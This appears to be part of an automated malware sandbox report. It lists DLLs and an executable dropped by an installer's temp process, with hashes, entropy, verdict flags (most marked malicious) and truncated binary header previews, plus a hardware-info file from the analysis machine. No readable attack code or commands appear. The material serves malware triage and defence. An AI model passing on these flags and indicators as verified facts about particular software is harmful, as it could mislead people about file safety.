                                                                                                                                                                                                                                        SSDEEP:48:MV3hrMZGYvAOPOrgkAVllg1NJa6PrjAXFZ6xOHZAFZ6xOHKjAFZArXzXhs+U+a8q:MnZoAOPOrgkA9g1NJa6PrjAVZakZGZaO
                                                                                                                                                                                                                                        MD5:E9D04A488B2901DEB37AD99D77740857
                                                                                                                                                                                                                                        SHA1:9AD315E085E55166267A78387DD98D5EA72E8BF6
                                                                                                                                                                                                                                        SHA-256:A3A195DEB84E27D8A05324949C3D5905BEAA05BAD572D6A3C4A00A693155E4D5
                                                                                                                                                                                                                                        SHA-512:4D33225331BDBAF3E9ACF7BF2D8A79BCD9E4276AB72E98307460262C9FBE0ADBFDBE22A786290111557C6A90EF6D19EC02FD2777F47B41E19755BE72BB6F88D7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:......[.H.W.I.n.f.o.].....m.o.d.e.l._.n.a.m.e.=.'.R.O.G. .S.T.R.I.X. .B.5.5.0.-.F. .G.A.M.I.N.G. .(.W.I.-.F.I.).'.....m.a.n.u.f.a.c.t.u.r.e.r.=.'.A.S.U.S.T.e.K. .C.O.M.P.U.T.E.R. .I.N.C...'.....f.r.e.q.=.'.3.9.'.....c.p.u._.m.a.n.u.f.a.c.t.u.r.e.r.=.'.A.u.t.h.e.n.t.i.c.A.M.D.'.....c.p.u._.m.o.d.e.l._.n.a.m.e.=.'.A.M.D. .R.y.z.e.n. .9. .5.9.5.0.X. .1.6.-.C.o.r.e. .P.r.o.c.e.s.s.o.r. . . . . . . . . . . . .'.....d.r.a.m._.s.i.z.e.=.'.1.7.1.7.9.8.6.9.1.8.4.,.1.7.1.7.9.8.6.9.1.8.4.'.....d.r.a.m._.m.a.n.u.f.a.c.t.u.r.e.r.=.'.K.i.n.g.s.t.o.n.,.K.i.n.g.s.t.o.n.'.....d.r.a.m._.f.r.e.q.u.e.n.c.y.=.'.2.4.0.0.,.2.4.0.0.'.....s.t.o.r.a.g.e._.c.a.p.a.c.i.t.y.=.'.1.8.6.3. .G.B.,.1.8.6.3. .G.B.,.9.3.2. .G.B.,.1.8.6.3. .G.B.,.9.3.2. .G.B.'.....s.t.o.r.a.g.e._.i.n.t.e.r.f.a.c.e.=.'.S.S.D.,.S.S.D.,.S.S.D.,.S.S.D.,.S.S.D.'.....n.i.c._.m.o.d.e.l._.n.a.m.e.=.'.I.n.t.e.l.(.R.). .W.i.-.F.i. .6. .A.X.2.0.0. .1.6.0.M.H.z.(.O.n.B.o.a.r.d.).,.I.n.t.e.l.(.R.). .E.t.h.e.r.n.e.t. .C.o.n.t.r.o.l.l.e.r. .(.3.). .I.2.
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):295384
                                                                                                                                                                                                                                        Entropy (8bit):6.384644936740942
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:+7BS1ak5I0CHEdGGgap8VywsC75bgs03d3tKRc/uk8QRYQrjRj332RYLwYwacyHd:QS1jzCMqLXv7GsStGcGCROYwYmq
                                                                                                                                                                                                                                        MD5:8D108CADED0B235B77A6A6C6A0D904B8
                                                                                                                                                                                                                                        SHA1:5C278A09C335B61C06E4CCB32D91C151400500F5
                                                                                                                                                                                                                                        SHA-256:AB7DBBA829D07BE48C7E45141BF769C4FFEBE86A78F170FD3EDAEE6B63A9D1F1
                                                                                                                                                                                                                                        SHA-512:F63C14071B12A89A1678B9AB291FAD8628F8FB24BC16880DED83A9F94DA73061394DE8EA322ECE71745BFA3273CE98BA80A5F8EB16F591F2A25CE3934A23837F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'...'...'...|..-...|.."...|......u...)...u...-...u.......|.. ...'...Z.......!.......&.....u.&...'...&.......&...Rich'...................PE..d.....f.........." .........`......X...............................................+.....`.................................................X...<............`..."...X...)..............p.......................(.......8............ ...............................text............................... ..`.rdata....... ......................@..@.data...."...0......................@....pdata..."...`...$...$..............@..@_RDATA...............H..............@..@.rsrc................J..............@..@.reloc...............P..............@..B........................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):359824
                                                                                                                                                                                                                                        Entropy (8bit):6.39968191694886
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:u13VpUk0KVRK/LO2rr08yimMjITFohPqCnhGYEuu7N:aVp50Ki/LWkmFTFoBByuu7N
                                                                                                                                                                                                                                        MD5:A2C2C8A50E3F93AD1C2F44AC23FDDBD3
                                                                                                                                                                                                                                        SHA1:F1F046F1ADC63FFB6E159AA161FE5CD947518AF3
                                                                                                                                                                                                                                        SHA-256:FF7013391FFFE0FFDA72F1DBE0ABDD8E73F7F3F85F3B99EE0E860C9004331211
                                                                                                                                                                                                                                        SHA-512:8FBC2A4C9C80218E8DF5D21550B2BE323DD981AAD5EAFBB2C75AF5047387CDEDE70D12BFD0D6DB6A7F411A816B61DFFA32E4C35A747A457CC03E8BDEC2B85A9E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............k.@.k.@.k.@...A.k.@...A.k.@...A.k.@...A.k.@...A.k.@...A.k.@...A.k.@...A.k.@.k.@9k.@k..A.k.@k..A.k.@k.;@.k.@k..A.k.@Rich.k.@................PE..d......b.........." ......................................................................`.............................................`...0...x............@...2...N.../......X.......p...........................0...8............................................text.............................. ..`.rdata...h.......j..................@..@.data....-..........................@....pdata...2...@...4..................@..@_RDATA...............>..............@..@.rsrc................@..............@..@.reloc..X............B..............@..B........................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):272024
                                                                                                                                                                                                                                        Entropy (8bit):6.401523708321372
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:jtIyoyUR96mycNRJ+JD3KJjCcyKVBd3BG/8R2HRExeobW:jeykR96mycPJ8mVBxBJ2Hqxeob
                                                                                                                                                                                                                                        MD5:0EFE3D3758D3BFBAAAC4083008F4ADEA
                                                                                                                                                                                                                                        SHA1:3A2277853EFAD84466235B0C2D2A3A622F7449B0
                                                                                                                                                                                                                                        SHA-256:0E19F6DE21D787067F49238FC75B620F876AEDF112A9365F4A0A38B66DF63EC4
                                                                                                                                                                                                                                        SHA-512:466E0899D43F097069F2D8FA386F29E5091E6D1D49351385749A67F0D59D81227CB9F3C48B96CD8FA3682FB29BA6D65D8A9906E69E4A2F8F50DFEB56816CD6F6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N..............9.......................................A.........#...............U......=..........Rich...................PE..d.....\e.........." ...#.....................................................P......K.....`.............................................l......|....0..h................&...@..`....e..p....................f..(....d..@............................................text............................... ..`.rdata..:...........................@..@.data... ...........................@....pdata..............................@..@.rsrc...h....0......................@..@.reloc..`....@......................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):199128
                                                                                                                                                                                                                                        Entropy (8bit):5.77155775659446
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:SJ613DnPspO8dsZ4olHTfEVFU6Vuu0tzbCwzayDwVqSrgIN4fICGs7:SO8d6ljEV+6Vu/dWs
                                                                                                                                                                                                                                        MD5:A2E1203EFF93BF15342E88727FE5BE34
                                                                                                                                                                                                                                        SHA1:CD95E9F872584411F08B26666F35E142C743C050
                                                                                                                                                                                                                                        SHA-256:193790697CD9F9A90F924671294A80873FEF8636A2E0C6BA8D9A57B4F4434176
                                                                                                                                                                                                                                        SHA-512:1E6D4E8FE940952132308C904CD9052A5E1035BA502B679FFEF044BA654084962DD4A59FB66B7686FAF369CAEE315E33CDE333CE3E8B11E46CD843898FB2F08C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:.F...........!......... ......~.... ........@.. ....................... ......sd......................................$...W........................)........................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):139624
                                                                                                                                                                                                                                        Entropy (8bit):6.1983818318989234
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:JM7Ef/ppaPmj51IxIAyBoKXVJpw5MWxRdd7FiQ/2x/:G7ybhYIAXKNwJxxN4
                                                                                                                                                                                                                                        MD5:B0043B40E915D1A10FEF14A95C4E7F54
                                                                                                                                                                                                                                        SHA1:CAE2D1DB34D64B4C043190E0106A0018BA0918AC
                                                                                                                                                                                                                                        SHA-256:5FB3E9634343CB9F5052A310BE6C6E398B11AB0CCEE55B60D0D80F6CD24911C9
                                                                                                                                                                                                                                        SHA-512:C0A8C234EBABAEC671A3CAA65F3304CBD5C2176CC92EB10520ADAC4600253F0A9B8DAF5302A7185244EFC4D604D722218CD2EA9368403754FAE31AAB3EF56D32
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._.Zy..4*..4*..4*~.0+..4*~.7+..4*~.1+..4*~.5+..4*..5*F.4*I.1+:.4*I.0+..4*I.7+..4*..=+..4*..4+..4*...*..4*...*..4*..6+..4*Rich..4*................PE..d...rU%d.........." .................S.......................................@......+6....`.............................................l.......<.... ..................h/...0..L......p...........................@................0...............................text............................... ..`.rdata.......0......................@..@.data...4...........................@....pdata..............................@..@.rsrc........ ......................@..@.reloc..L....0......................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):21
                                                                                                                                                                                                                                        Entropy (8bit):3.8442328987631917
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:WIVKLTpn:PgL1n
                                                                                                                                                                                                                                        MD5:4FDD914244F257BA902260A7B65D05AE
                                                                                                                                                                                                                                        SHA1:BE047B70DF80783B6693C88CEF7233CD86C7A2A3
                                                                                                                                                                                                                                        SHA-256:CFF791C25B17603124B6B549A29963B3D0B771CB6ECC19002DE16A132F7EBACC
                                                                                                                                                                                                                                        SHA-512:0938F16F3D681A30E9861E59EFCDE5C89E4F04D04DE2F457337032AC6D1E228B92E4489B8B45F0404A14179D08473719E2ACC4DDB4E8E8F782B66AB89EF633FF
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:HWComponentPlugin.dll
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1667544
                                                                                                                                                                                                                                        Entropy (8bit):5.96495732757551
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:/cXMn2kbBdCEtvrPJIs4RbYI3kirPbRQe3e6d18bBHdC:/cc2k7pS
                                                                                                                                                                                                                                        MD5:43B71C0A50EAF646CDF3BC7A0672B3E2
                                                                                                                                                                                                                                        SHA1:56CC102402BB5FD86D8E5875050AFB7C71A6090D
                                                                                                                                                                                                                                        SHA-256:CC50A7B0DF5274317D1B6A030E3AC33815F1C9D3A0EF813FFEC405E5D844D420
                                                                                                                                                                                                                                        SHA-512:99BFD19E88F38D9BA80BEEC4C31FECEF4C46657098809DADD3FFAC8A3325D59335CEF2BC195124AA8D3933A25A66EE99CB27C1CDB8990E9E0F54577847B486CD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...Y.i..........."...0..@............... .....@..... ...............................o....`...@......@............... ...............................`...............H...)...........^..8............................................................ ..H............text...\?... ...@.................. ..`.rsrc........`.......B..............@..@........................................H.......h)..<$...........M..............................................J.r...p.s....(....*Js....%o....o....&*..(....*...0..F........r!..p}.....r...p}.....(....}.....r...p}......}.....(.....(.....(....*...0..c.......r!..p(....rK..p(......i..i..2.../.(....o....+/.(.....~.....~....(....(........(....(....o......&..*.........__.......0..@........s....o ...~....%-.&~......"...s!...%.....(...+(...+%-.&.*o$...*.0..4.......r...p. ....s%........ .....(....&.o&......o&.......*........$*......
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):449496
                                                                                                                                                                                                                                        Entropy (8bit):6.177250619165656
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:uf907Z9VXtV5w8VR4SfoTP2GcG6kZBK7+:s90t97w8VoKGcG6cBKC
                                                                                                                                                                                                                                        MD5:75FB5858513B1A9C4555064196F2FFCF
                                                                                                                                                                                                                                        SHA1:0658EAEBCE3932274DCF9958B83E08A8C2EB9568
                                                                                                                                                                                                                                        SHA-256:988A1ED7B2125741C695103F532F99C9002FC14D6B3FCB6698CDF6AE4AA07BBE
                                                                                                                                                                                                                                        SHA-512:D318E1B3CAC29B287E24D029D240828E2B858AF97CEBBE0A329AA1DE83FF4509A127FA229BE83CA43AB22FEABFEDB54802DE18A22EAF8245A65A6120899A131C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......,P{.h1.Lh1.Lh1.LaI.L|1.L:D.M`1.L:D.ML1.L:D.Ma1.L:D.Ml1.L|Z.Mi1.L|Z.Ml1.L|Z.Mu1.Lh1.L.0.L.X.Ml1.L.D.M~1.L.D.Mi1.L.D.Li1.Lh1.Li1.L.D.Mi1.LRichh1.L................PE..d...O..f.........." .................`..............................................jD....`..........................................X.......Z..0................0.......)..............p.......................(.......8............................................text.............................. ..`.rdata.............................@..@.data................l..............@....pdata...0.......2...v..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):13472
                                                                                                                                                                                                                                        Entropy (8bit):6.292043114894753
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:WrB5jnA6+FpGKCRXEWfWlrWngbXH9YOCAs/nGfe4pBjSjM:WrnjnA6+MXEWfWlrIgbCA0GftpBj9
                                                                                                                                                                                                                                        MD5:8C454E6D06D56C19F355F702B15EBB15
                                                                                                                                                                                                                                        SHA1:6D4322B7BC25A50E0C5EFC80DD71824592D3A040
                                                                                                                                                                                                                                        SHA-256:3A1475D6F1A99AB2A85AFEDFF3DB6454D901EBF1DE1D58E294EA2CB16516648A
                                                                                                                                                                                                                                        SHA-512:6D1C221430668BE2C7DAAE9D27AAA621038F8F52F5AC3CF9A6D02D10F33E85718E08017E5CF6CDB9E2CB10CE66EB9212DCC6C88FB17C4FB486C7D71720B6BDFB
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...//.U...........!..................... ...@....... ..............................`v....@.................................4...W....@.......................`.......,............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p.......H........ ..,...................P ......................................0..L....7.^...........w. ..E&."...v.hi.l..Y....3..%?...G...7.C.Y|.k.8..vb.kq..P.qw..F.(.5."..i.,1.i9....\t.)...gr..7BSJB............v4.0.30319......l...p...#~..........#Strings............#US.........#GUID.......`...#Blob...........GW........%3........................................................................l.e...............'.e...<.e...d.J.......................................7.....P.
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):418696
                                                                                                                                                                                                                                        Entropy (8bit):6.021730081658021
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:GIDKBfonoNFTFGQ1N421Ub9bNuAdlAzy/hA1h6H7BdCEtvrPJIs4u2bYIzK1I6hM:nnATFZ16bBdCEtvrPJIs4RbYIa
                                                                                                                                                                                                                                        MD5:5F4D7D0FC695C2FBC9BEA18271BA6778
                                                                                                                                                                                                                                        SHA1:F116880355A4A8936CDD1FE953FCF126833DB0D8
                                                                                                                                                                                                                                        SHA-256:E0ABCA4F407DD17B77EADE645114CC700397D99EE86CD6BF46DE7D7C8D8BCECA
                                                                                                                                                                                                                                        SHA-512:36B65443EED8FFF62ABB5AC2BA3C4641181F860EC93211F2F1363CCF3EDE5295C15D3021EB34DBF7A4AFCAFE56F087A3654036166455818367D6556622670956
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....sx`.........." ..0..6...........U... ...`....... ..............................`c....`.................................LU..O....`...............@...#...........T............................................... ............... ..H............text....5... ...6.................. ..`.rsrc........`.......8..............@..@.reloc...............>..............@..B.................U......H................................S.......................................0..Q...............}.....(%.....}......}......}.......}.......}.......}.......}.......}....*..*..*.s&...z..{....*2.{....o'...*.*....0...........{....,Y.{......j/N...{....iY...0..+......{.....{....i.((.....{.....jX}......X....Y...{......j/.*.{....-T.{.....{....j.{....s)......{......{.....|.....{.....{....,..{....+...{....oE...}......1..{.......o*.....{.....jX}....*..0..............s+.....{....,`.{......j/
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):368520
                                                                                                                                                                                                                                        Entropy (8bit):5.930673554971986
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:tUheTc27502HNoekbDhKirPrppRQfbL8ysiZQM:tUheTc2FZ0DkirPbRQl
                                                                                                                                                                                                                                        MD5:F8D78FFA9E4600984086B07C2C04C832
                                                                                                                                                                                                                                        SHA1:9C46C68E5F622E610292AD78D4F7A7CF2FB9E7EC
                                                                                                                                                                                                                                        SHA-256:2ECCA6B05A516090D3E97558ACCA7B89D908E34B7DD5B79DDEF74E6A8CBDE5B7
                                                                                                                                                                                                                                        SHA-512:FEFA25C3869105C36D26FAF1422E3CEF2535B0B34BA995BF6F63360ED61746A98B5D30345064850D89C458EA73F4A252D4E9591B0321BB3E6C5F79C8AEAFD47A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....sx`.........." ..0..r...........F... ........... ..............................\x....`..................................F..O....................|...#..........`E............................................... ............... ..H............text...@q... ...r.................. ..`.rsrc................t..............@..@.reloc...............z..............@..B.................F......H...........4....................D........................................()...*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*.0..'..........(*...-..+...(+......(,...s-...}....*..{....*..0..'..........(*...-..+...(+......(,...s-...}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*....0..;........(....(....,,.(....(....,..(.......(*...-..(.......(*...*.*Jr...p.(.....(/...*F.(....,...(.....*
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):305552
                                                                                                                                                                                                                                        Entropy (8bit):6.4083242939173815
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:/YjMr0NcUTrHglzwsGqSqosoh/1iZX2ZIR:QjMrWcw0yXqNoT4+IR
                                                                                                                                                                                                                                        MD5:66AD0E987BADD3C3809E012EEF10E246
                                                                                                                                                                                                                                        SHA1:F01A159E82366F127C88A26697416EB8C048AB8F
                                                                                                                                                                                                                                        SHA-256:848E341FD8859CAF431B1B1571AF0D84F07576CDF07298DA93CE9AD98064B03A
                                                                                                                                                                                                                                        SHA-512:87BFEBD0CC8B76BE541DD0838713A10960EFD9FE8AD83B9D54DBCDB9E0655A0F2976759465B8D91B8F9FD0DBA3E4A488F66F970101C5AA66923F1E29E6DE7DD2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............^...^...^..._...^..._}..^..._...^..._...^..._...^..._...^..._...^...^b..^#.._...^#.._...^#.G^...^#.._...^Rich...^................PE..d......b.........." ................................................................5.....`..........................................:..L...<;..d...............<*...z.../..............p...........................P...8...............p............................text............................... ..`.rdata...7.......8..................@..@.data...t'...P......................@....pdata..<*.......,...@..............@..@_RDATA...............l..............@..@.rsrc................n..............@..@.reloc...............p..............@..B................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):663000
                                                                                                                                                                                                                                        Entropy (8bit):5.94538238272737
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:WG86nitqrIT6Eqk56i258EJsUQUUJ9LBHd2U+:H7itqr3e6d18J9LBHd2F
                                                                                                                                                                                                                                        MD5:4A2FC86ED202B5E7378A7B84F947B2F1
                                                                                                                                                                                                                                        SHA1:6888E73A57D0C999725D57F68E9E16A6F729294F
                                                                                                                                                                                                                                        SHA-256:60605ED6CEFD158EDE7B6B2C2C6804765E8E5EFF602F232F337759C3D5DFD52B
                                                                                                                                                                                                                                        SHA-512:E0FDE10265310D607519FB13FE7114B50E6160487AC0164393E78DD8346FF0BEBDEF9476166A4DB7CB86EEAE44A501F2372DD3AB5EF103323ACB9CD1C02710F8
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....X.........." ..0.............^.... ... ....... .......................`............`.....................................O.... ..`................)...@....................................................... ............... ..H............text........ ...................... ..`.rsrc...`.... ......................@..@.reloc.......@......................@..B................@.......H.......Th..................X...T.........................................{....*"..}....*..($...*:.($.....}....*"..(%...*..(....*..{ ...*"..} ...*..{!...*"..}!...*..{"...*"..}"...*..{#...*"..}#...*..{$...*"..}$...*..{*...*>..}*.....(....*..{+...*>..}+.....(....*..{%...*"..}%...*..0...........{&......(....-..*..(....*6..s....}&...*.0...........{'......(....-..*..(....*6..s....}'...*.0...........{(......(....-..*..(....*6..s....}(...*.0...........{)......(....-..*..(....*6..s..
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):358760
                                                                                                                                                                                                                                        Entropy (8bit):6.422019035317325
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:bXxYSK5qJG+DnVj1+cyVf9pmrj9mUwlScRflohB5BC1IKWRtr:TKkM+DnV4cy99crEUIR9onD6WRd
                                                                                                                                                                                                                                        MD5:B109529B212C9C19EFCB010940B43388
                                                                                                                                                                                                                                        SHA1:FF3F223D5563051EF8E81A4D1BC8B1CA28EB6B13
                                                                                                                                                                                                                                        SHA-256:4AE8ECE6F610DF4902152B13971B5B4E2D75BB48BA632EFA55A47633EB918089
                                                                                                                                                                                                                                        SHA-512:CAC516DF8792158697A33484D4C14960874210A684C428D21EEE6E4AE57A8D3157F5C414B016630AC58701227BF16E9101D294A7F37F2A1842DDAA2EC64DD30E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........<A..R...R...R...Q...R...W.V.R.......R..V...R..Q...R..W...R...T...R...V...R...S...R...S...R.T.[...R.T.R...R.T.....R.......R.T.P...R.Rich..R.................PE..d......d.........." .................:...............................................0....`.................................................@...x............P.../...J..h/.............p.......................(...P...8...............X............................text...>........................... ..`.rdata...k.......l..................@..@.data....1..........................@....pdata.../...P...0..................@..@_RDATA...............:..............@..@.rsrc................<..............@..@.reloc...............@..............@..B........................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):54824
                                                                                                                                                                                                                                        Entropy (8bit):6.565299102080387
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:IvYH6XbSX2iFeNlCERRLa0g7G/0+k3QSkVliAV6a7srzgUjFYicm0VNZoo:qXWFeNlCERRLa0gUEGQrz1jF7u1t
                                                                                                                                                                                                                                        MD5:4E1D7DF7612E1EFB030592C5AE992BDE
                                                                                                                                                                                                                                        SHA1:1DF24C667F581E49A7B3CB92DB6263B5039EB9CB
